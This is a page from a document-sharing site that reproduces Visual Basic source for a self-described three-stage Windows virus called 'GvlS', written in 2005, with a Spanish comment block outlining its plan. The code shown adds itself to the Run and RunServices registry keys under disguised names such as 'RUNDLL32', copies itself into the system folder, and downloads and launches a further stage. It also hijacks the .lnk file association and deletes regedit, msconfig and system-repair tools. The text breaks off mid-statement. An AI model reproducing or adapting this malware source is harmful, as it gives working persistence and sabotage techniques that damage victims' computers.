Вы находитесь на странице: 1из 7

'------------------------------------------------------------------------------------------------------------------------------------------------'GvlS Primera parte: '1)Se almacena en el registro Run. '2)Se regenera el archivo a la carpeta SYSTEM.

'3)Y tambien se almacena en el registro en RunServices. '4)Auto descarga la 2da parte del proceso. '5)Al terminar la descarga ejecuta el archivo. 'GvlS Segunda parte: '1)Se almacena en el registro Run. '2)Elimina todos los archivos de windows que puedan llegar a acceder al registro o editarlo, Regedit.exe, ScanReg.exe, Msconfig.exe ect. '3)Busca 150 archivos de nombres de antivirus y no deja correr los procesos, si encuentra alguno la pc(ejecutado) se reinicia. '4)Infecta todas las extenciones Mp3, Jpg, Posiblemente los LNK, pero seria muy obvio. '5)Descarga la 3ra parte. '6)Ejecuta la 3ra parte. 'GvlS 3ra parte y final: '1)Se reenvia a toda la lista de contactos de MSN y OutLook Express. '2)Infecta TODAS las extenciones de la pc. '3)Hace una descarga masiva de todos los virus viejos y conocidos. (Aproximadamente 5 o 6) '4)Ejecuta todos los virus conocidos. '5)Llama al servicio tecnico. 'CoDeD By Ger VolkS 'Gracias a Camilo por sus ideas :D !! 'Gracias a Zapoo por prestar un HOST de 800 MBs. gratis! 'El codigo despues de finalizar sera OPENSOURCE. '-------------------------------------------------------------------------------------------------------------------------------------------------

'[ARGENTINA] 'Codigo del GvlS programado por Ger VolkS. /2005 'Gracias Camilo que aporto ideas y conceptos. 'Gracias a Zapoo que presto nu HOST DE 800MB para subir las particiones! Option Explicit '%%%%%%%%%%%%%%%%%%%%%%%%%% Se copia el fichero %%%%%%%%%%%%%%%%%% %%%%%%%%%%%%% Private sFicOri As String Private sFicDes As String Private iFlags As Long Private Enum eOpciones cFOF_ALLOWUNDO cFOF_FILESONLY cFOF_MULTIDESTFILES cFOF_NOCONFIRMATION cFOF_NOCONFIRMMKDIR cFOF_RENAMEONCOLLISION cFOF_SILENT cFOF_SIMPLEPROGRESS End Enum Private Type SHFILEOPSTRUCT hWnd As Long wFunc As Long pFrom As String pTo As String fFlags As Long fAnyOperationsAborted As Boolean hNameMappings As Long lpszProgressTitle As String End Type Private Enum eFO FO_COPY = &H2& FO_DELETE = &H3& FO_MOVE = &H1& FO_RENAME = &H4& ' FOF_MULTIDESTFILES = &H1& FOF_CONFIRMMOUSE = &H2& FOF_SILENT = &H4& FOF_RENAMEONCOLLISION = &H8& FOF_NOCONFIRMATION = &H10& FOF_WANTMAPPINGHANDLE = &H20& FOF_ALLOWUNDO = &H40& FOF_FILESONLY = &H80& FOF_SIMPLEPROGRESS = &H100& FOF_NOCONFIRMMKDIR = &H200& FOF_NOERRORUI = &H400& FOF_NOCOPYSECURITYATTRIBS = &H800& End Enum Private Declare Function SHFileOperation Lib "shell32.dll" Alias "SHFileOperationA" _

' ' ' '

Copiar Borrar Mover Renombrar

(lpFileOp As SHFILEOPSTRUCT) As Long Private mReg As cQueryReg Private Const cvRun As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" Private Const cvRunS As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServi ces" Private Const cvRunSec As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" Private Const cvRunSecS As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServi ces" Public Nrocarpetas As Integer Public Carpeta As Integer Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long Private Declare Function FindWindow Lib "user32.dll" Alias "FindWindowA" (ByVal lpClassName As Any, ByVal lpWindowName As Any) As Long '%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%% Se copia el fichero %%%%%%%%%%%%%%%%%%

'Se fija donde esta el archivo para poder copiarlo Private Sub Form_Load() Set mReg = New cQueryReg txtExe.Text = App.Path & "\" & App.EXEName & ".exe" txtExe.SelStart = Len(txtExe.Text) 'Se fija donde esta el archivo para poder copiarlo End Sub Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) 'Si el archivo es cerrado, se vuelve a abrir. (falta arreglar algo) 'Shell App.Path & "C:\WINDOWS\SYSTEM\GVSsecond.exe" & App.EXEName & "GvlS.exe" End Sub 'Timer que activa todas las funciones" Private Sub tmrAOpen_Timer() Call InsWin Call GenArchiv txtExe.Text = "C:\WINDOWS\SYSTEM\GvlS.exe" txtClave.Text = "Microsoft Windows Reg V" Call InsWin2 txtExe.Text = "C:\WINDOWS\SYSTEM\GVSecond.exe" txtClave.Text = "RUNDLL32" Call InsWin3 txtExe.Text = "C:\WINDOWS\SYSTEM\GVSecond.exe" txtClave.Text = "TASKMON" Call InsWin4 txtExe.Text = "C:\WINDOWS\SYSTEM\GVSecond.exe" txtDes.Text = "C:\WINDOWS\GVSecond.exe" Call GenArchiv2 Call RndCap Call AutoDownload

Call EjecSecond Call BorraArchv Call Extensiones tmrAOpen.Enabled = False 'Timer que activa todas las funciones" End Sub 'Ejecuta el archivo que abre la 2da parte Public Sub EjecSecond() 'On Error Resume Next Dim res As Long res = ShellExecute(Me.hWnd, "Open", Label1.Caption, "", "", 1) End Sub Private Sub txtExe_OLEDragDrop(Data As DataObject, Effect As Long, Button As Integer, Shift As Integer, X As Single, Y As Single) txtExe.Text = Data.Files(1) End Sub '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&&&&& AUTO OPEN%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%% Public Sub InsWin() Dim s As String ' s = mReg.GetRegString(cvRun, txtClave.Text) s = mReg.GetRegString(cvRun, txtClave.Text) If s <> "" Then Else If mReg.SetReg(cvRun, txtClave.Text, txtExe.Text) = ERROR_NONE Then Else End If End If End Sub Public Sub InsWin2() Dim s As String ' s = mReg.GetRegString(cvRunS, txtClave.Text) s = mReg.GetRegString(cvRunS, txtClave.Text) If s <> "" Then Else If mReg.SetReg(cvRunS, txtClave.Text, txtExe.Text) = ERROR_NONE Then Else End If End If End Sub Public Sub InsWin3() Dim s As String ' s = mReg.GetRegString(cvRunSec, txtClave.Text) s = mReg.GetRegString(cvRunSec, txtClave.Text) If s <> "" Then Else If mReg.SetReg(cvRunSec, txtClave.Text, txtExe.Text) = ERROR_NONE Then

Else End If End If End Sub Public Sub InsWin4() Dim s As String ' s = mReg.GetRegString(cvRunSecS, txtClave.Text) s = mReg.GetRegString(cvRunSecS, txtClave.Text) If s <> "" Then Else If mReg.SetReg(cvRunSecS, txtClave.Text, txtExe.Text) = ERROR_NONE Then Else End If End If End Sub '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%&&&&& AUTO OPEN%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%% Private Sub GenArchiv() ' Copiar Dim SHFileOp As SHFILEOPSTRUCT If (cFOF_RENAMEONCOLLISION) Then _ iFlags = iFlags + FOF_RENAMEONCOLLISION sFicOri = txtExe & vbNullChar & vbNullChar sFicDes = txtDes & vbNullChar & vbNullChar With SHFileOp .wFunc = FO_COPY .fFlags = iFlags .hWnd = Me.hWnd .pFrom = sFicOri .pTo = sFicDes End With Call SHFileOperation(SHFileOp) End Sub Private Sub GenArchiv2() Dim SHFileOp As SHFILEOPSTRUCT If (cFOF_RENAMEONCOLLISION) Then _ iFlags = iFlags + FOF_RENAMEONCOLLISION sFicOri = txtExe & vbNullChar & vbNullChar sFicDes = txtDes & vbNullChar & vbNullChar With SHFileOp .wFunc = FO_COPY .fFlags = iFlags .hWnd = Me.hWnd .pFrom = sFicOri .pTo = sFicDes End With

Call SHFileOperation(SHFileOp) End Sub Public Sub RndCap() On Error Resume Next Carpeta = txtExe.Text Randomize Nrocarpetas = Dir1.ListCount - 1 Carpeta = Int((Nrocarpetas * Rnd) + 1) Dir1.ListIndex = Carpeta If Int((10 * Rnd) + 1) > 2 Then Dir1.Path = Dir1.List(Carpeta) End If Carpeta = Dir1.Path End Sub Public Sub AutoDownload() On Error Resume Next Inet1.AccessType = icUseDefault Dim B() As Byte Dim strURL As String If (FOF_RENAMEONCOLLISION) Then _ iFlags = iFlags + FOF_RENAMEONCOLLISION strURL = "http://www.google.com.ar/images/hp0.gif" B() = Inet1.OpenURL(strURL, icByteArray) Open "C:\WINDOWS\SYSTEM\hp0.gif" For Binary Access _ Write As #1 Put #1, , B() Close #1 End Sub Public Sub Extensiones() On Error Resume Next Dim clsAssociate As New CAssociate clsAssociate.Title = "A sample extension" clsAssociate.Class = "A sample extension.NewExt" clsAssociate.Extension = ".lnk" clsAssociate.AppCommand = "C:\Mis documentos\German\Visual Basic\GvlS\gvls.exe" clsAssociate.DefaultIcon = "C:\Mis documentos\German\Visual Basic\GvlS\gvls.exe,1" clsAssociate.Associate End Sub Public Sub BorraArchv() Kill ("c:\windows\regedit.exe") Kill ("c:\windows\scanregw.exe") Kill ("c:\windows\system\msconfig.exe") Kill ("c:\windows\system\sfc.exe") End Sub

Option Explicit Private Declare Function (ByVal hWnd As Long) Private Declare Function "GetWindowTextLengthA" _ (ByVal hWnd As Long) Private Declare Function "GetWindowTextA" _ (ByVal hWnd As Long, As Long IsWindowVisible Lib "user32" _ As Long GetWindowTextLength Lib "user32" Alias As Long GetWindowText Lib "user32" Alias ByVal lpString As String, ByVal cch As Long)

Private Declare Function GetDesktopWindow Lib "user32" () As Long ' GetWindow() Private Const Private Const Private Const Constants GW_HWNDFIRST = 0& GW_HWNDNEXT = 2& GW_CHILD = 5&

Private Declare Function GetWindow Lib "user32" _ (ByVal hWnd As Long, ByVal wFlag As Long) As Long ' Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _ (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _ (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Private Private Private Const Const Const Const SC_MINIMIZE = &HF020& SC_CLOSE = &HF060& WM_SYSCOMMAND = &H112 WM_CLOSE = &H10

Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" _ (ByVal hWnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long Public Sub CloseApp(ByVal Titulo As String, Optional ClassName As String) Dim hWnd As Long If Titulo <> "Progman" Then hWnd = FindWindow(ClassName, Titulo) Call SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, ByVa